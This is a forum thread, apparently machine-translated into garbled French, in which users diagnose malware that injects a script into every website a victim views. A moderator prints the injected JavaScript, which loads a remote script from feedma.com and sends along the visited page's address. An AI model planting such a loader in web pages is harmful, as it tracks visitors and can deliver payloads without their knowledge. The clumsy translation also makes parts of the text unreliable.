Retour à Discussion Générale

Virus ajoute le javascript pour sites

  • Don2007
  • Web Master
  • Web Master
  • No Avatar
  • Inscription: Nov 21, 2006
  • Messages: 4924
  • Loc: NY
  • Status: Offline

Message Janvier 4th, 2010, 3:13 pm

Non, dit-il à toutes les pages du site feedma, pas tous les sites.
How do you know when a politician is lying? His mouth is moving.
  • Anonymous
  • Bot
  • No Avatar
  • Inscription: 25 Feb 2008
  • Messages: ?
  • Loc: Ozzuland
  • Status: Online

Message Janvier 4th, 2010, 3:13 pm

  • ATNO/TW
  • Super Moderator
  • Super Moderator
  • Avatar de l’utilisateur
  • Inscription: Mai 28, 2003
  • Messages: 23404
  • Loc: Woodbridge VA
  • Status: Offline

Message Janvier 4th, 2010, 4:04 pm

Saviez télécharger n'importe qui http://feedma.com/cgi-bin/cont/cont.cgi?uuid= (5809AA41-8B64-4074-8 fév-32FD41BC1113)?

On obtient:

Code: [ Select ]
if(top == self)
{
    document.write('<script type="text/javascript" src="http://feedma.com/cgi-bin/cont/contt.cgi?&uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}&ref='+top.location+'" charset="utf-8"></script>');
}
//
  1. if(top == self)
  2. {
  3.     document.write('<script type="text/javascript" src="http://feedma.com/cgi-bin/cont/contt.cgi?&uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}&ref='+top.location+'" charset="utf-8"></script>');
  4. }
  5. //


Whats up with that?
"There's no place like 127.0.0.1 except for ::1."
Alexandria Networks. Leader in IT consulting for associations/non-profits, and small to medium sized businesses around the northern Virginia and Washington D.C. metro area.
  • alex89
  • Bronze Member
  • Bronze Member
  • Avatar de l’utilisateur
  • Inscription: Juil 18, 2008
  • Messages: 239
  • Loc: Western Australia
  • Status: Offline

Message Janvier 4th, 2010, 9:55 pm

grinch2171 a écrit:
alex89 a écrit:
13 objets trouvés après 12 minutes de la numérisation. Should have got a mac.


J'adore quand les gens prennent des commentaires de ce genre, je trouve ça hilarant. J'ai couru pas un anti-virus, anti-malware, anti-n'importe quoi sur n'importe lequel de mes ordinateurs à domicile au cours des années et je n'ai pas attrapé un virus ou quoi que ce soit malveillant pendant ce temps. Je ne exécutez un pare-feu matériel though. J'ai aussi deux jeunes utiliser ces PC et de rien. Les gens aiment à pointer du doigt Microsoft et disent que c'est leur faute, mais elle n'est pas. La plupart du temps c'est votre faute, vous avez un virus. Vous avez cliqué sur quelque chose que tu n'aurais pas dû, vous avez ouvert une pièce jointe vous ne devriez pas avoir, ou que ce soit. En bout de ligne, vous avez fait quelque chose de pas Microsoft.


Pêche à la traîne modérée est réussie. gif "alt =": P "title =" Razz ">

Im bien consciente que ses ma faute, ce qui s'est passé, Im just kidding. Bien que je ne macs respect de certaines de leurs caractéristiques (conception de l'interface notamment).

joebert a écrit:
NoScript pour Firefox, Nice. Comment est-ce que vous aider autant que IE ou la chose vous avez probablement en cours d'exécution en arrière-plan la recherche de mises à jour méchant?

Ce que je veux savoir, c'est comment est cette chose faire apparaître cette ligne dans le source HTML que vous voyez?
Etes-vous sûr que vous n'allez pas à travers un proxy thats ajoutant ou quoi?

Je pense que si somethings détournement de la page inbetween le temps qu'il arrive à votre ordinateur, pour le moment il est stocké dans le cache HTML et affiché, les navigateurs, tout serait affectée. gif "alt =": scratchhead: "title =" #Scratch Head ">


IE ne fonctionne pas, et il n'y a pas de processus en cours que je ne sais pas exactement ce qu'ils font. (J'aime bien faire fonctionner un navire serré - pas de services d'appoint ou de processus de démarrage / que nécessaire)

Thats ce que je pensais aussi, mais il ne s'est certainement pas dans Safari ou Chrome. Son étrange. Pas de proxy.

digitalMedia a écrit:
Le virus est d'insérer cet extrait dans l'ensemble des sites qu'il vues.


Ouais vous avez raison. Don Désolé si je n'était pas claire.

ATNO/TW a écrit:
Saviez télécharger n'importe qui http://feedma.com/cgi-bin/cont/cont.cgi?uuid= (5809AA41-8B64-4074-8 fév-32FD41BC1113)?

On obtient:

Code: [ Select ]
if(top == self)
{
    document.write('<script type="text/javascript" src="http://feedma.com/cgi-bin/cont/contt.cgi?&uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}&ref='+top.location+'" charset="utf-8"></script>');
}
//
  1. if(top == self)
  2. {
  3.     document.write('<script type="text/javascript" src="http://feedma.com/cgi-bin/cont/contt.cgi?&uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}&ref='+top.location+'" charset="utf-8"></script>');
  4. }
  5. //


Whats up with that?


Si sa le cadre du haut, ajouter ce script à nouveau? Wouldnt il boucle? Je ne sais pas. Je pense qu'il ya probablement plus de suivi que les annonces ou quelque chose de malicieux. N'hésitez pas à me corriger si Im tort.

De bonnes nouvelles même si - je suis parti quelques scanners hier soir, et il se passe plus rien. Had to restart pour supprimer / réparer une DLL, je crois que c'était probablement lui. Est-ce que quelqu'un sait d'une DLL que IE et FF partager? Je voudrais savoir plus sur ce genre de chose.

Mais merci pour toutes les réponses :)

1, 2

Afficher de l'information

  • Total des messages de ce sujet: 18 messages
  • Utilisateurs parcourant ce forum: jflynn, ScottG et 187 invités
  • Vous ne pouvez pas poster de nouveaux sujets
  • Vous ne pouvez pas répondre aux sujets
  • Vous ne pouvez pas éditer vos messages
  • Vous ne pouvez pas supprimer vos messages
  • Vous ne pouvez pas joindre des fichiers
 
 

© 2011 Unmelted, LLC. Ozzu® est une marque déposée de Unmelted, LLC